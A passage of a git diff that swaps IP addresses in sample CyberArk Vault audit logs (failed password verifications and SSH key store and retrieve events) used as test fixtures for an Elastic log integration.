Driver Manager] Data source name not found and no default driver specified\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:33:17","IsoTimestamp":"2021-03-15T17:33:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829597"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T17:38:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 10:38:27\n 2021-03-15T17:38:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n\n address=127.0.0.1;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 10:38:27","IsoTimestamp":"2021-03-15T17:38:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length\n","ExtraDetails":"address=127.0.0.1;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"127.0.0.1"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615829907"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=%ADDRESS%;user=%USER%;option=3;port=%PORT%;Password=%LOGONPASSWORD%"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: HY090 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Invalid string or buffer length"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} <7>1 2021-03-15T18:00:07Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:00:07\n 2021-03-15T18:00:07Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Database-MySQL-10.0.1.20-root\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n\n address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:00:07","IsoTimestamp":"2021-03-15T18:00:07Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Database-MySQL-10.0.1.20-root","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Password Safe: partner, Folder: Root, Object: Database-MySQL-10.0.1.20-root failed (try #0). Code: 2103, Error: Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified\n","ExtraDetails":"address=Driver\\={MySQL ODBC 5.3 Unicode Driver}\\;server\\=127.0.0.1\\;user\\=root\\;option\\=3\\;port\\=3306\\;Password\\=1234;username=root;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"MySQL"},{"Name":"UserName","Value":"root"},{"Name":"Address","Value":"Driver={MySQL ODBC 5.3 Unicode Driver};server=127.0.0.1;user=root;option=3;port=3306;Password=1234"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615831206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"Port","Value":"3306"},{"Name":"Database","Value":"test"},{"Name":"DSN","Value":"mysql"},{"Name":"CPMErrorDetails","Value":"Error when verifypass to User root on Server . State: IM002 Native error: 0 Message: [Microsoft][ODBC Driver Manager] Data source name not found and no default driver specified"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Database"}]}}}} -<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-15T18:05:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 11:05:16\n 2021-03-15T18:05:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 11:05:16","IsoTimestamp":"2021-03-15T18:05:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #3). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=3;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"3"},{"Name":"LastFailDate","Value":"1615831516"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<7>1 2021-03-16T09:50:19Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 02:50:19\n 2021-03-16T09:50:19Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n\n address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 02:50:19","IsoTimestamp":"2021-03-16T09:50:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.15-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #4). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=67.43.156.15;retriescount=4;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"67.43.156.15"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log index 8c7361274f6..e8abd4c0395 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/427_store_ssh_key.log @@ -1 +1 @@ -<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}} +<5>1 2021-03-11T16:50:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:17\n 2021-03-11T16:50:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 427\n Store SSH Key\n Info\n Administrator\n Store SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n \n \n Store SSH Key\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:17","IsoTimestamp":"2021-03-11T16:50:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"427","Desc":"Store SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Store SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store SSH Key","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log index 1420d0a428e..b51cf1be1ff 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/428_retrieve_ssh_key.log @@ -1,3 +1,3 @@ -<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 34.123.103.115)\n \n \n testing\n Connect\n \n \n 34.123.103.115\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 34.123.103.115)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"34.123.103.115"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:52","IsoTimestamp":"2021-03-15T13:18:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)","PvwaDetails":{"RetrieveReason":{"General":{"RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T17:43:44Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:43:44\n 2021-03-11T17:43:44Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)for fun and profit\n \n \n for fun and profit\n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:43:44","IsoTimestamp":"2021-03-11T17:43:44Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Retrieve SSH key)for fun and profit","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"for fun and profit","RetrieveAction":"Retrieve SSH key"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-11T21:08:48Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 13:08:48\n 2021-03-11T21:08:48Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Connect)testing(Connection to address: 67.43.156.15)\n \n \n testing\n Connect\n \n \n 67.43.156.15\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 13:08:48","IsoTimestamp":"2021-03-11T21:08:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"428","Desc":"Retrieve SSH Key","Severity":"Info","Issuer":"Administrator","Action":"Retrieve SSH Key","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)testing(Connection to address: 67.43.156.15)","PvwaDetails":{"RetrieveReason":{"General":{"UserReason":"testing","RetrieveAction":"Connect"},"ConnectionDetails":{"ConnectionAddress":"67.43.156.15"}}},"ExtraDetails":"","Message":"Retrieve SSH Key","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:52Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:52\n 2021-03-15T13:18:52Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 428\n Retrieve SSH Key\n Info\n Administrator\n Retrieve SSH Key\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 127.0.0.1\n \n \n \n (Action: Retrieve SSH key)\n \n \n Retrieve SSH key\n \n\n \n Retrieve SSH Key\n 10.0.1.20\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 